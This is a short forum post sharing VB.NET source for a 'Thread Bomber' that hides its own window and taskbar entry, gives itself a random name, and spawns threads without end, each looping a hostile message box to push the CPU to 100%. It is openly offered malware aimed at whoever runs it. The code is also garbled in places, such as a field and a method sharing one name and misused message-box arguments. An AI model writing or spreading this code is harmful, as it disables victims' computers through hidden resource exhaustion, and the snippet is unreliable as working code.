13 Years of Service
92%
Thread Bomber[100% CPU]
Code:
>Public Randomz As Random
(Frm1_Load Sub Etc...Here)
Visible = False
ShowInTaskbar = False
Name = Randomz.Next(100000)
Do
Dim Threadzy as thread
Threadzy = New Thread(AddressOf Me.Randomz)
Threadzy.Start()
Loop
End Sub
Sub Randomz
Do
MsgBox("I Strike Again, Death To The Republic!", "NExTliFE")
Loop
End Sub